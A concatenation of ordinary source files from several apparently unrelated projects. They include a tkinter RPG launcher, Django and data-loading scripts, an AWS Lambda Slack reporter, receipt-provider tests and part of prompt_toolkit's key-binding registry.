self.new_cred.keeped() Credential.copy_username("gigi") self.assertEqual(self.new_cred.username,pyperclip.paste()) if __name__ == '__main__': unittest.main() # -*- coding: utf-8 -*- import os import networkx as nx from nxpd import draw from socialgraph.socialgraph import subgraph_by_topic, elect_committee, paint_graph MAX_EDGES = 300 TOPIC = 'Groceries' wiki_file = os.path.join('..', 'datasets', 'wiki.graphml') G = nx.read_graphml(wiki_file) print("Full graph: {0} nodes {1} edges".format(len(G.nodes()), len(G.edges()))) # Generate smaller graph and override G subnodes = G.nodes()[:MAX_EDGES] G = G.subgraph(subnodes) print("Subgraph: {0} nodes {1} edges".format(len(G.nodes()), len(G.edges()))) # Filter graph by subtopic G = subgraph_by_topic(G, TOPIC) draw(G) committee = elect_committee(G, 20) print("Committee:") print({k: len(v) for k, v in committee.items()}) draw(paint_graph(G, committee))0 '''Create a game with races and some classes of an ordinary fantasy medieval rpg where: 1. You choose a race, a class and start 1v1 battles against some monsters, gaining points for each monster defeated. Each race and class will have some unique traits and skills. 2. The battle system will use some dices (like a Tabletop RPG) that will influence on the results of the battle. There will be three main options to choose to act: Attack (with at least 2 different attacks by class), Defend (where the dice results are used as shields to reduce the enemy attack), Evade (where if your dice results are greater than the enemy, you nullify the enemy damage else you take the entire damage, and use some item). 3. When your character dies you will receive your points acumulated for each enemy defeated.''' from tkinter import * from tkinter import ttk import os from RPG_module.classes import * from RPG_module.functions import * dir = os.path.dirname(__file__) game = Tk() game.title('RPG Horde Game') game.geometry('700x400') screen_fr = Frame(game, borderwidth=1, relief='flat', background='lightblue') screen_fr.place(x=0, y=0, width=1280, height=660) img = PhotoImage(file=dir+r'\Images\rpg_screen.gif') lb_img = Label(screen_fr, image=img, borderwidth=0).pack() start_fr = Frame(lb_img, borderwidth=1, relief='raised', background='black', width=400, height=400) start_fr.pack(pady=60, ipady=20) start_title = Label(start_fr, text='RPG Horde Game', font=('Comic Sans MS', 15), foreground='white', background='darkred', width=30) start_title.grid(columnspan=2, row=0, sticky='n') Label(start_fr, text='Character Name', bg='darkred', fg='white', font=('Comic Sans MS', 12)).grid(columnspan=2, row=1, pady=20) c_name = Entry(start_fr, width=23) c_name.grid(columnspan=2, row=2) Label(start_fr, text='Race', font=('Comic Sans MS', 12), background='darkred', foreground='white').grid(columnspan=2, row=3, pady=20) races = ['Human', 'Elf', 'Dwarf', 'Half Orc'] start_race = ttk.Combobox(start_fr, values=races) start_race.set(races[0]) start_race.grid(columnspan=2, row=4) Label(start_fr, text='Class', font=('Comic Sans MS', 12), background='darkred', foreground='white').grid(columnspan=2, row=5, pady=20) classes = ['Knight', 'Mage', 'Archer', 'Swordsman', 'Barbarian', 'Rogue'] start_class = ttk.Combobox(start_fr, values=classes) start_class.set(classes[0]) start_class.grid(columnspan=2, row=6) Label(start_fr, text='Battle Scene', font=('Comic Sans MS', 12), bg='darkred', fg='white').grid(columnspan=2, row=7, pady=20) scenes = ['Scene 1', 'Scene 2', 'Scene 3'] scene = ttk.Combobox(start_fr, values=scenes) scene.set(value=scenes[0]) scene.grid(columnspan=2, row=8) btn_play = Button(start_fr, text='Play Game', font=('Comic Sans MS', 12), background='darkred', foreground='white', command=play) btn_play.grid(column=0, row=9, pady=25, sticky='e', padx=15) btn_exit = Button(start_fr, text='Exit Game', font=('Comic Sans MS', 12), background='darkred', foreground='white', command=game.quit) btn_exit.grid(column=1, row=9, pady=25, sticky='w', padx=15) game.mainloop() from kws import * # ~/anaconda3/envs/envGeoDB/bin/python import os import numpy as np from osgeo import gdal import psycopg2 import subprocess from datetime import datetime as dt import time dbName = 'gisdb' schName = 'modis' varName = 'fpar' tRg = [dt(2011, 1, 1), dt(2011, 3, 1)] # hTileRg = [7, 12] # vTileRg = [4, 6] hTileRg = [8, 9] vTileRg = [4, 5] modisDir = '/mnt/sdb/rawData/MCD15A2H.006/' fileLst = list() dateStrLst = [x for x in os.listdir(modisDir) if dt.strptime(x, '%Y.%m.%d') >= tRg[0] and dt.strptime(x, '%Y.%m.%d') <= tRg[1]] for dateStr in dateStrLst: modisFolder = os.path.join(modisDir, dateStr) for fileName in os.listdir(modisFolder): if fileName.endswith('.hdf'): tileStr = fileName.split('.')[2] hTile = int(tileStr[1:3]) vTile = int(tileStr[4:6]) if hTile >= hTileRg[0] and hTile <= hTileRg[1] \ and vTile >= vTileRg[0] and vTile <= vTileRg[1]: fileLst.append(os.path.join(modisDir, dateStr, fileName)) conn = psycopg2.connect(database='gisdb', user='postgres', host="localhost", password='', port=5432) cursor = conn.cursor() bTable = False try: cursor = conn.cursor() cursor.execute( r"SELECT EXISTS(SELECT fpar FROM modis)") bTable = True except psycopg2.Error as errStr: print(errStr) t1 = time.time() for f in fileLst: if bTable is False: cmdOpt = '-s 96431 -F -I -R -C -c' else: cmdOpt = '-s 96431 -F -I -R -C -a' cmdFile = 'HDF4_EOS:EOS_GRID:'+f+':MOD_Grid_MOD15A2H:Fpar_500m' cmdTab = 'modis.fpar' cmdOut = '| psql -d gisdb' cmd = ' '.join(['raster2pgsql', cmdOpt, cmdFile, cmdTab, cmdOut]) subprocess.call(cmd, shell=True) if bTable is False: # cursor = conn.cursor() # cursor.execute( # r"SELECT DropRasterConstraints('modis','fpar', 'rast','enforce_same_alignment_rast')") bTable = True print('load MODIS: ', time.time()-t1) from django.urls import path from django.http import HttpResponse urlpatterns = [ path("overridden_url/", lambda r: HttpResponse("Overridden urlconf works!")) ] SACGF/variantgrid from django.conf import settings from django.core.management.base import BaseCommand from snpdb.models import VCF, log_traceback, SomalierVCFExtract, GenomeBuild, SomalierRelatePairs from snpdb.tasks.somalier_tasks import somalier_vcf_id, somalier_all_samples class Command(BaseCommand): def add_arguments(self, parser): parser.add_argument("--genome-build") parser.add_argument('--clear', action='store_true') def handle(self, *args, **options): if options.get("clear"): SomalierVCFExtract.objects.all().delete() SomalierRelatePairs.objects.all().delete() vcf_kwargs = {} if build_name := options.get("genome_build"): vcf_kwargs["genome_build"] = GenomeBuild.get_name_or_alias(build_name) if not settings.SOMALIER.get("enabled"): raise ValueError("settings.SOMALIER['enabled'] not enabled!") for vcf in VCF.objects.filter(somaliervcfextract__isnull=True, **vcf_kwargs): try: somalier_vcf_id(vcf.pk) except: log_traceback() somalier_all_samples() neuromake/menu/__init__.py from .menu import Menu from .samples import * import torch.nn as nn def lstm(input_size, hidden_size, **kwargs): m = nn.LSTM(input_size, hidden_size, **kwargs) for name, param in m.named_parameters(): if 'weight' in name or 'bias' in name: param.data.uniform_(-0.1, 0.1) return m def lstm_cell(input_size, hidden_size, **kwargs): m = nn.LSTMCell(input_size, hidden_size, **kwargs) for name, param in m.named_parameters(): if 'weight' in name or 'bias' in name: param.data.uniform_(-0.1, 0.1) return m def linear(in_features, out_features, bias=True, dropout=0.): """Linear layer (input: N x T x C)""" m = nn.Linear(in_features, out_features, bias=bias) m.weight.data.uniform_(-0.1, 0.1) if bias: m.bias.data.uniform_(-0.1, 0.1) return m def embedding(num_embeddings, embedding_dim, padding_idx): m = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx) nn.init.uniform_(m.weight, -0.1, 0.1) nn.init.constant_(m.weight[padding_idx], 0) return m1-10 import os import datetime import json from base64 import b64decode import boto3 from botocore.vendored import requests def handler(event, context): """ Invokes the main function for each report module """ with open('config.json') as f: config = json.load(f) reports = config['reports'] function = os.environ.get('FUNCTION', None) env = os.environ.get('ENV', None) day = datetime.datetime.now().strftime('%Y%m%d') bucket = 'kf-reports-us-east-1-{}-quality-reports'.format(env) output = '{}/{}-reports'.format(bucket, day) lam = boto3.client('lambda') for report in reports: report_output = '{}/{}'.format(output, report['name'].replace(' ', '_')) report['output'] = report_output response = lam.invoke( FunctionName=function, InvocationType='Event', Payload=str.encode(json.dumps(report)), ) print('invoked report {}'.format(report['name'])) print('output to {}'.format(report['output'])) # Send slack message if 'SLACK_SECRET' in os.environ and 'SLACK_CHANNEL' in os.environ: kms = boto3.client('kms', region_name='us-east-1') SLACK_SECRET = os.environ.get('SLACK_SECRET', None) SLACK_TOKEN = kms.decrypt(CiphertextBlob=b64decode(SLACK_SECRET)).get('Plaintext', None).decode('utf-8') SLACK_CHANNEL = os.environ.get('SLACK_CHANNEL', '').split(',') SLACK_CHANNEL = [c.replace('#','').replace('@','') for c in SLACK_CHANNEL] TRACKER_URL = os.environ.get('REPORT_TRACKER', '') for channel in SLACK_CHANNEL: bucket = output.split('/')[0] path = '/'.join(output.split('/')[1:]) report_url = f"https://s3.amazonaws.com/{bucket}/index.html#{path}/" attachments = [{ "text": "{} tasty reports ready for viewing".format(len(reports)), "fallback": "{} tasty reports ready for viewing".format(len(reports)), "callback_id": "view_report", "color": "#3AA3E3", "attachment_type": "default", "actions": [ { "name": "overview", "text": "View Now", "type": "button", "url": f'{TRACKER_URL}?url='+report_url, "style": "primary" } ] }] message = { 'username': 'Report Bot', 'icon_emoji': ':bar_chart:', 'channel': channel, 'attachments': attachments, 'text': 'New reports are in hot and fresh :pie:' } resp = requests.post('https://slack.com/api/chat.postMessage', headers={'Authorization': 'Bearer '+SLACK_TOKEN}, json=message) binding.gyp { "targets": [ { "target_name": "crc", "sources": [ "./src/crc_module.c", "./src/crc.c" ] }, ] }# Generated by Django 2.1.2 on 2018-12-05 20:25 import django.contrib.postgres.fields.jsonb from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [] operations = [ migrations.CreateModel( name="DiscordGuild", fields=[ ("id", models.BigIntegerField(primary_key=True, serialize=False)), ( "data", django.contrib.postgres.fields.jsonb.JSONField( blank=True, null=True ), ), ("cached_date", models.DateTimeField(auto_now_add=True)), ], options={ "verbose_name": "Discord Guild", "verbose_name_plural": "Discord Guilds", }, ), ] sergelevin/pyofdtest/test_providers.py # -*- coding: utf-8 -*- import unittest import pyofd from datetime import datetime receipts_data = { 'Taxcom': { 'fpd': 1027455652, 'total': 1487, 'rn_kkt': 1482558031668, 'fd': 9960, 'inn': 7814148471, 'purchase_date': datetime(year=2018, month=1, day=7, hour=14, minute=51) }, 'Platforma': { 'fpd': 504931317, 'total': '822.91', 'fn': 8710000100186516, 'rn_kkt': '0000051440037872', 'fd': 136682, 'inn': 5036045205, 'purchase_date': datetime(year=2018, month=1, day=10, hour=17, minute=37) }, '1-OFD': { 'fpd': 2819037689, 'total': '1948.28', 'fn': 8710000100828376, 'fd': 87242, 'inn': 7840016802, 'purchase_date': datetime(year=2017, month=9, day=30, hour=16, minute=7) }, 'Yarus': { 'fpd': 4023651155, 'total': '526.00', 'rn_kkt': 691164058512, 'fd': 34113, 'inn': 7705814643, 'purchase_date': datetime(year=2018, month=1, day=13, hour=20, minute=44) }, 'OfdRu': { 'fpd': 2981623349, 'total': 330, 'rn_kkt': 489397013091, 'fd': 7481, 'inn': 7814339162, 'fn': 8710000100617432, 'purchase_date': datetime(year=2018, month=1, day=16, hour=13, minute=11) }, 'Yandex': { 'fpd': 3826178549, 'total': '390', 'rn_kkt': 840594031594, 'fd': 238872, 'inn': 7704340310, 'purchase_date': datetime(year=2018, month=3, day=7, hour=10, minute=57) }, 'Kontur': { 'fpd': 1753141947, 'total': 838, 'rn_kkt': 1573495028400, 'fd': 3250, 'inn': 7736567560, 'fn': 8710000101500109, 'purchase_date': datetime(year=2018, month=5, day=6, hour=19, minute=44) } } class ProvidersTest(unittest.TestCase): def _test_single_provider(self, provider): self.assertIn(provider, receipts_data) kwargs = receipts_data[provider] receipt = pyofd.OFDReceipt(**kwargs) result = receipt.load_receipt() self.assertIsNotNone(result) self.assertIsNotNone(receipt.provider) self.assertEqual(provider, receipt.provider.providerName) def test_taxcom(self): self._test_single_provider('Taxcom') def test_platforma(self): self._test_single_provider('Platforma') def test_first_ofd(self): self._test_single_provider('1-OFD') def test_yarus(self): self._test_single_provider('Yarus') def test_ofd_ru(self): self._test_single_provider('OfdRu') def test_yandex(self): self._test_single_provider('Yandex') def test_kontur(self): self._test_single_provider('Kontur') 0 import cx_Oracle import pandas as pd import datetime as dt from typing import List, Tuple, TypedDict from src.appLogger import getAppLogger class VoltStatsFetcher(): """repo class to fetch derived voltage from mis_warehouse db. """ def __init__(self, con_string): """constructor method Args: con_string ([type]): connection string """ self.connString = con_string self.voltTable1 = [] self.voltTable2 = [] self.voltTable3 = [] self.voltTable4 = [] self.derivedVoltageDict = {'table1': self.voltTable1, 'table2': self.voltTable2, 'table3': self.voltTable3, 'table4': self.voltTable4} self.appLogger = getAppLogger() def appendTables(self, df: pd.core.frame.DataFrame) -> None: """ append rows for each table for each day voltTable1 =[] voltTable2 =[] voltTable3 =[] voltTable4 =[] Args: df (pd.core.frame.DataFrame): pandas dataframe that contains derived voltage data for each day for all nodes. """ date = df['DATE_KEY'][0].day dfTable1 = df.iloc[0:9] dfTable2 = df.iloc[9:18] dfTable2.reset_index(drop=True, inplace=True) dfTable3 = df.iloc[18:27] dfTable3.reset_index(drop=True, inplace=True) dfTable4 = df.iloc[27:] dfTable4.reset_index(drop=True, inplace=True) tempDictTable1 = {'date': date, 'amreliMax': dfTable1['MAXIMUM'][0], 'amreliMin': dfTable1['MINIMUM'][0], 'asojMax': dfTable1['MAXIMUM'][1], 'asojMin': dfTable1['MINIMUM'][1], 'bhilaiMax': dfTable1['MAXIMUM'][2], 'bhilaiMin': dfTable1['MINIMUM'][2], 'bhopalMax': dfTable1['MAXIMUM'][3], 'bhopalMin': dfTable1['MINIMUM'][3], 'boisarMax': dfTable1[ 'MAXIMUM'][4], 'boisarMin': dfTable1['MINIMUM'][4], 'damohMax': dfTable1['MAXIMUM'][5], 'damohMin': dfTable1['MINIMUM'][5], 'dehgamMax': dfTable1['MAXIMUM'][6], 'dehgamMin': dfTable1['MINIMUM'][6], 'dhuleMax': dfTable1['MAXIMUM'][7], 'dhuleMin': dfTable1['MINIMUM'][7], 'gwaliorMax': dfTable1['MAXIMUM'][8], 'gwaliorMin': dfTable1['MINIMUM'][8]} self.voltTable1.append(tempDictTable1) tempDictTable2 = {'date': date, 'indoreMax': dfTable2['MAXIMUM'][0], 'indoreMin': dfTable2['MINIMUM'][0], 'itarsiMax': dfTable2['MAXIMUM'][1], 'itarsiMin': dfTable2['MINIMUM'][1], 'jetpurMax': dfTable2['MAXIMUM'][2], 'jetpurMin': dfTable2['MINIMUM'][2], 'kalwaMax': dfTable2['MAXIMUM'][3], 'kalwaMin': dfTable2['MINIMUM'][3], 'karadMax': dfTable2[ 'MAXIMUM'][4], 'karadMin': dfTable2['MINIMUM'][4], 'kasorMax': dfTable2['MAXIMUM'][5], 'kasorMin': dfTable2['MINIMUM'][5], 'khandwaMax': dfTable2['MAXIMUM'][6], 'khandwaMin': dfTable2['MINIMUM'][6], 'nagdaMax': dfTable2['MAXIMUM'][7], 'nagdaMin': dfTable2['MINIMUM'][7], 'parliMax': dfTable2['MAXIMUM'][8], 'parliMin': dfTable2['MINIMUM'][8]} self.voltTable2.append(tempDictTable2) tempDictTable3 = {'date': date, 'raigarhMax': dfTable3['MAXIMUM'][0], 'raigarhMin': dfTable3['MINIMUM'][0], 'raipurMax': dfTable3['MAXIMUM'][1], 'raipurMin': dfTable3['MINIMUM'][1], 'vapiMax': dfTable3['MAXIMUM'][2], 'vapiMin': dfTable3['MINIMUM'][2], 'wardhaMax': dfTable3['MAXIMUM'][3], 'wardhaMin': dfTable3['MINIMUM'][3], 'binaMax': dfTable3[ 'MAXIMUM'][4], 'binaMin': dfTable3['MINIMUM'][4], 'durgMax': dfTable3['MAXIMUM'][5], 'durgMin': dfTable3['MINIMUM'][5], 'gwaliorMax': dfTable3['MAXIMUM'][6], 'gwaliorMin': dfTable3['MINIMUM'][6], 'indoreMax': dfTable3['MAXIMUM'][7], 'indoreMin': dfTable3['MINIMUM'][7], 'kotraMax': dfTable3['MAXIMUM'][8], 'kotraMin': dfTable3['MINIMUM'][8]} self.voltTable3.append(tempDictTable3) tempDictTable4 = {'date': date, 'sasanMax': dfTable4['MAXIMUM'][0], 'sasanMin': dfTable4['MINIMUM'][0], 'satnaMax': dfTable4['MAXIMUM'][1], 'satnaMin': dfTable4['MINIMUM'][1], 'seoniMax': dfTable4['MAXIMUM'][2], 'seoniMin': dfTable4['MINIMUM'][2], 'sipatMax': dfTable4['MAXIMUM'] [3], 'sipatMin': dfTable4['MINIMUM'][3], 'tamnarMax': dfTable4['MAXIMUM'][4], 'tamnarMin': dfTable4['MINIMUM'][4], 'vadodaraMax': dfTable4['MAXIMUM'][5], 'vadodaraMin': dfTable4['MINIMUM'][5], 'wardhaMax': dfTable4['MAXIMUM'][6], 'wardhaMin': dfTable4['MINIMUM'][6]} self.voltTable4.append(tempDictTable4) def fetchDerivedVoltage(self, startDate: dt.datetime, endDate: dt.datetime): """fetch derived voltage from mis_warehouse db Args: startDate (dt.datetime): start date endDate (dt.datetime): end date Returns: derivedVoltageDict ={'table1':voltTable1, 'table2':voltTable2, 'table3':voltTable3, 'table4':voltTable4 } """ startDateLogString = dt.datetime.strftime(startDate, '%Y-%m-%d') endDateLogString = dt.datetime.strftime(endDate, '%Y-%m-%d') logExtra = {"startDate": startDateLogString, "endDate": endDateLogString} # generating dates between startDate and endDate dates = [] delta = endDate - startDate for i in range(delta.days + 1): dates.append(startDate + dt.timedelta(days=i)) try: connection = cx_Oracle.connect(self.connString) except Exception as err: # print('error while creating a connection', err) self.appLogger.error( 'error creating db connection for stationwise voltage stats', exc_info=err, extra=logExtra) else: print(connection.version) try: cur = connection.cursor() # fetching derived voltage data for each day. for date in dates: fetch_sql = '''select vt.date_key, vt.node_name,mt.node_voltage, vt.maximum, vt.minimum from derived_voltage vt, voltage_mapping_table mt where vt.mapping_id = mt.id and mt.is_included_in_daily_voltage = 'T' and date_key = to_date(:start_date) ''' cur.execute( "ALTER SESSION SET NLS_DATE_FORMAT = 'YYYY-MM-DD ' ") df = pd.read_sql(fetch_sql, params={ 'start_date': date}, con=connection) # sorting node_name alphabetically. df.sort_values(['NODE_VOLTAGE', 'NODE_NAME'], ascending=[ True, True], inplace=True, ignore_index=True) # passing object to appendTables method. df['MAXIMUM'] = df['MAXIMUM'].round().astype(int) df['MINIMUM'] = df['MINIMUM'].round().astype(int) self.appendTables(df) except Exception as err: # print('error while creating a cursor', err) self.appLogger.error( 'error while stationwise voltage stats sql db fetch', exc_info=err, extra=logExtra) else: print('retrieval of derived voltage stats data complete') connection.commit() finally: cur.close() connection.close() print("connection closed") return self.derivedVoltageDict lubitelpospat/CFM-source """ Key bindings registry. A `KeyBindings` object is a container that holds a list of key bindings. It has a very efficient internal data structure for checking which key bindings apply for a pressed key. Typical usage:: kb = KeyBindings() @kb.add(Keys.ControlX, Keys.ControlC, filter=INSERT) def handler(event): # Handle ControlX-ControlC key sequence. pass It is also possible to combine multiple KeyBindings objects. We do this in the default key bindings. There are some KeyBindings objects that contain the Emacs bindings, while others contain the Vi bindings. They are merged together using `merge_key_bindings`. We also have a `ConditionalKeyBindings` object that can enable/disable a group of key bindings at once. It is also possible to add a filter to a function, before a key binding has been assigned, through the `key_binding` decorator.:: # First define a key handler with the `filter`. @key_binding(filter=condition) def my_key_binding(event): ... # Later, add it to the key bindings. kb.add(Keys.A, my_key_binding) """ from abc import ABCMeta, abstractmethod, abstractproperty from typing import ( TYPE_CHECKING, Callable, Hashable, List, Optional, Sequence, Tuple, TypeVar, Union, cast, ) from prompt_toolkit.cache import SimpleCache from prompt_toolkit.filters import FilterOrBool, Never, to_filter from prompt_toolkit.keys import KEY_ALIASES, Keys # Avoid circular imports. if TYPE_CHECKING: from .key_processor import KeyPressEvent __all__ = [ "Binding", "KeyBindingsBase", "KeyBindings", "ConditionalKeyBindings", "merge_key_bindings", "DynamicKeyBindings", "GlobalOnlyKeyBindings", ] KeyHandlerCallable = Callable[["KeyPressEvent"], None] class Binding: """ Key binding: (key sequence + handler + filter). (Immutable binding class.) :param record_in_macro: When True, don't record this key binding when a macro is recorded. """ def __init__( self, keys: Tuple[Union[Keys, str], ...], handler: KeyHandlerCallable, filter: FilterOrBool = True, eager: FilterOrBool = False, is_global: FilterOrBool = False, save_before: Callable[["KeyPressEvent"], bool] = (lambda e: True), record_in_macro: FilterOrBool = True, ) -> None: self.keys = keys self.handler = handler self.filter = to_filter(filter) self.eager = to_filter(eager) self.is_global = to_filter(is_global) self.save_before = save_before self.record_in_macro = to_filter(record_in_macro) def call(self, event: "KeyPressEvent") -> None: self.handler(event) def __repr__(self) -> str: return "%s(keys=%r, handler=%r)" % ( self.__class__.__name__, self.keys, self.handler, ) # Sequence of keys presses. KeysTuple = Tuple[Union[Keys, str], ...] class KeyBindingsBase(metaclass=ABCMeta): """ Interface for a KeyBindings. """ @abstractproperty def _version(self) -> Hashable: """ For cache invalidation. - This should increase every time that something changes. """ return 0 @abstractmethod def get_bindings_for_keys(self, keys: KeysTuple) -> List[Binding]: """ Return a list of key bindings that can handle these keys. (This return also inactive bindings, so the `filter` still has to be called, for checking it.) :param keys: tuple of keys. """ return [] @abstractmethod def get_bindings_starting_with_keys(self, keys: KeysTuple) -> List[Binding]: """ Return a list of key bindings that handle a key sequence starting with `keys`. (It does only return bindings for which the sequences are longer than `keys`. And like `get_bindings_for_keys`, it also includes inactive bindings.) :param keys: tuple of keys. """ return [] @abstractproperty def bindings(self) -> List[Binding]: """ List of `Binding` objects. (These need to be exposed, so that `KeyBindings` objects can be merged together.) """ return [] # `add` and `remove` don't have to be part of this interface. T = TypeVar("T", bound=Union[KeyHandlerCallable, Binding]) class KeyBindings(KeyBindingsBase): """ A container for a set of key bindings. Example usage:: kb = KeyBindings() @kb.add('c-t') def _(event): print('Control-T pressed') @kb.add('c-a', 'c-b') def _(event): print('Control-A pressed, followed by Control-B') @kb.add('c-x', filter=is_searching) def _(event): print('Control-X pressed') # Works only if we are searching. """ def __init__(self) -> None: self._bindings: List[Binding] = [] self._get_bindings_for_keys_cache: SimpleCache[ KeysTuple, List[Binding] ] = SimpleCache(maxsize=10000) self._get_bindings_starting_with_keys_cache: SimpleCache[ KeysTuple, List[Binding] ] = SimpleCache(maxsize=1000) self.__version = 0 # For cache invalidation. def _clear_cache(self) -> None: self.__version += 1 self._get_bindings_for_keys_cache.clear() self._get_bindings_starting_with_keys_cache.clear() @property def bindings(self) -> List[Binding]: return self._bindings @property def _version(self) -> Hashable: return self.__version def add( self, *keys: Union[Keys, str], filter: FilterOrBool = True, eager: FilterOrBool = False, is_global: FilterOrBool = False, save_before: Callable[["KeyPressEvent"], bool] = (lambda e: True), record_in_macro: FilterOrBool = True, ) -> Callable[[T], T]: """ Decorator for adding a key bindings. :param filter: :class:`~prompt_toolkit.filters.Filter` to determine when this key binding is active. :param eager: :class:`~prompt_toolkit.filters.Filter` or `bool`. When True, ignore potential longer matches when this key binding is hit. E.g. when there is an active eager key binding for Ctrl-X, execute the handler immediately and ignore the key binding for Ctrl-X Ctrl-E of which it is a prefix. :param is_global: When this key bindings is added to a `Container` or `Control`, make it a global (always active) binding. :param save_before: Callable that takes an `Event` and returns True if we should save the current buffer, before handling the event. (That's the default.) :param record_in_macro: Record these key bindings when a macro is being recorded. (True by default.) """ assert keys keys = tuple(_parse_key(k) for k in keys) if isinstance(filter, Never): # When a filter is Never, it will always stay disabled, so in that # case don't bother putting it in the key bindings. It will slow # down every key press otherwise. def decorator(func: T) -> T: return func else: def decorator(func: T) -> T: if isinstance(func, Binding): # We're adding an existing Binding object. self.bindings.append( Binding( keys, func.handler, filter=func.filter & to_filter(filter), eager=to_filter(eager) | func.eager, is_global=to_filter(is_global) | func.is_global, save_before=func.save_before, record_in_macro=func.record_in_macro, ) ) else: self.bindings.append( Binding( keys, cast(KeyHandlerCallable, func), filter=filter, eager=eager, is_global=is_global, save_before=save_before, record_in_macro=record_in_macro, ) ) self._clear_cache() return func return decorator def remove(self, *args: Union[Keys, str, KeyHandlerCallable]) -> None: """ Remove a key binding. This expects either a function that was given to `add` method as parameter or a sequence of key bindings. Raises `ValueError` when no bindings was found. Usage:: remove(handler) # Pass handler. remove('c-x', 'c-a') # Or pass the key bindings. """ found = False if callable(args[0]): assert len(args) == 1 function = args[0] # Remove the given function. for b in self.bindings: if b.handler == function: self.bindings.remove(b) found = True else: assert len(args) > 0 args = cast(Tuple[Union[Keys, str]], args) # Remove this sequence of key bindings. keys = tuple(_parse_key(k) for k in args) for b in self.bindings: if b.keys == keys: self.bindings.remove(b) found = True if found: self._clear_cache() else: # No key binding found for this function. Raise ValueError. raise ValueError("Binding not found: %r" % (function,)) # For backwards-compatibility. add_binding = add remove_binding = remove def get_bindings_for_keys(self, keys: KeysTuple) -> List[Binding]: """ Return a list of key bindings that can handle this key. (This return also inactive bindings, so the `filter` still has to be called, for checking it.) :param keys: tuple of keys. """ def get() -> List[Binding]: result: List[Tuple[int, Binding]] = [] for b in self.bindings: if len(keys) == len(b.keys): match = True any_count = 0 for i, j in zip(b.keys, keys): if i != j and i != Keys.Any: match = False break if i == Keys.Any: any_count += 1 if match: result.append((any_count, b)) # Place bindings that have more 'Any' occurrences in them at the end. result = sorted(result, key=lambda item: -item[0]) return [item[1] for item in result] return self._get_bindings_for_keys_cache.get(keys, get) def get_bindings_starting_with_keys(self, keys: KeysTuple) -> List[Binding]: """ Return a list of key bindings that handle a key sequence starting with `keys`. (It does only return bindings for which the sequences are longer than `keys`. And like `get_bindings_for_keys`, it also includes inactive bindings.) :param keys: tuple of keys. """ def get() -> List[Binding]: result = [] for b in self.bindings: if len(keys) < len(b.keys): match = True for i, j in zip(b.keys, keys): if i != j and i != Keys.Any: match = False break if match: result.append(b) return result return self._get_bindings_starting_with_keys_cache.get(keys, get) def _parse_key(key: Union[Keys, str]) -> Union[str, Keys]: """ Replace key by alias and verify whether it's a valid one. """ # Already a parse key? -> Return it. if isinstance(key, Keys): return key # Lookup aliases. key = KEY_ALIASES.get(key, key) # Replace 'space' by ' ' if key == "space": key = " " # Return as `Key` object when it's a special key. try: return Keys(key) except ValueError: pass # Final validation. if len(key) != 1: raise ValueError("Invalid key: %s" % (key,)) return key def key_binding( filter: FilterOrBool = True, eager: FilterOrBool = False, is_global: FilterOrBool = False, save_before: Callable[["KeyPressEvent"], bool] = (lambda event: True), record_in_macro: FilterOrBool = True, ) -> Callable[[KeyHandlerCallable], Binding]: """ Decorator that turn a function into a `Binding` object. This can be added to a `KeyBindings` object when a key binding is assigned. """ assert save_before is None or callable(save_before) filter = to_filter(filter) eager = to_filter(eager) is_global = to_filter(is_global) save_before = save_before record_in_macro = to_filter(record_in_macro) keys = () def decorator(function: KeyHandlerCallable) -> Binding: return Binding( keys, function, filter=filter, eager=eager, is_global=is_global, save_before=save_before, record_in_macro=record_in_macro, ) return decorator class _Proxy(KeyBindingsBase): """ Common part for ConditionalKeyBindings and _MergedKeyBindings. """ def __init__(self) -> None: # `KeyBindings` to be synchronized with all the others. self._bindings2: KeyBindingsBase = KeyBindings() self._last_version: Hashable = () def _update_cache(self) -> None: """ If `self._last_version` is outdated, then this should update the version and `self._bindings2`. """ raise NotImplementedError # Proxy methods to self._bindings2. @property def bindings(self) -> List[Binding]: self._update_cache() return self._bindings2.bindings @property def _version(self) -> Hashable: self._update_cache() return self._last_version def get_bindings_for_keys(self, *a, **kw): self._update_cache() return self._bindings2.get_bindings_for_keys(*a, **kw) def get_bindings_starting_with_keys(self, *a, **kw): self._update_cache() return self._bindings2.get_bindings_starting_with_keys(*a, **kw) class ConditionalKeyBindings(_Proxy): """ Wraps around a `KeyBindings`. Disable/enable all the key bindings according to the given (additional) filter.:: @Condition def setting_is_true(): return True # or False registry = ConditionalKeyBindings(key_bindings, setting_is_true) When new key bindings are added to this object. They are also enable/disabled according to the given `filter`. :param registries: List of :class:`.KeyBindings` objects. :param filter: :class:`~prompt_toolkit.filters.Filter` object. """ def __init__( self, key_bindings: KeyBindingsBase, filter: FilterOrBool = True ) -> None: _Proxy.__init__(self) self.key_bindings = key_bindings self.filter = to_filter(filter) def _update_cache(self) -> None: " If the original key bindings was changed. Update our copy version. " expected_version = self.key_bindings._version if self._last_version != expected_version: bindings2 = KeyBindings() # Copy all bindings from `self.key_bindings`, adding our condition. for b in self.key_bindings.bindings: bindings2.bindings.append( Binding( keys=b.keys, handler=b.handler, filter=self.filter & b.filter, eager=b.eager, is_global=b.is_global, save_before=b.save_before, record_in_macro=b.record_in_macro, ) ) self._bindings2 = bindings2 self._last_version = expected_version class _MergedKeyBindings(_Proxy): """ Merge multiple registries of key bindings into one. This class acts as a proxy to multiple :class:`.KeyBindings` objects, but behaves as if this is just one bigger :class:`.KeyBindings`. :param registries: List of :class:`.KeyBindings` objects. """ def __init__(self, registries: Sequence[KeyBindingsBase]) -> None: _Proxy.__init__(self) self.registries = registries def _update_cache(self) -> None: """ If one of the original registries was changed. Update our merged version. """ expected_version = tuple(r._version for r in self.registries) if self._last_version != expected_version: bindings2 = KeyBindings() for reg in self.registries: bindings2.bindings.extend(reg.bindings) self._bindings2 = bindings2 self._last_version = expected_version def merge_key_bindings(bindings: Sequence[KeyBindingsBase]) -> _MergedKeyBindings: """ Merge multiple :class:`.Keybinding` objects together. Usage:: bindings = merge_key_bindings([bindings1, bindings2, ...]) """ return _MergedKeyBindings(bindings) class DynamicKeyBindings(_Proxy): """ KeyBindings class that can dynamically returns any KeyBindings. :param get_key_bindings: Callable that returns a :class:`.KeyBindings` instance. """ def __init__( self, get_key_bindings: Callable[[], Optional[KeyBindingsBase]] ) -> None: self.get_key_bindings = get_key_bindings self.__version = 0 self._last_child_version = None self._dummy = KeyBindings() # Empty key bindings. def _update_cache(self) -> None: key_bindings = self.get_key_bindings() or self._dummy assert isinstance(key_bindings, KeyBindingsBase) version = id(key_bindings), key_bindings._version self._bindings2 = key_bindings self._last_version = version class GlobalOnlyKeyBindings(_Proxy): """ Wrapper around a 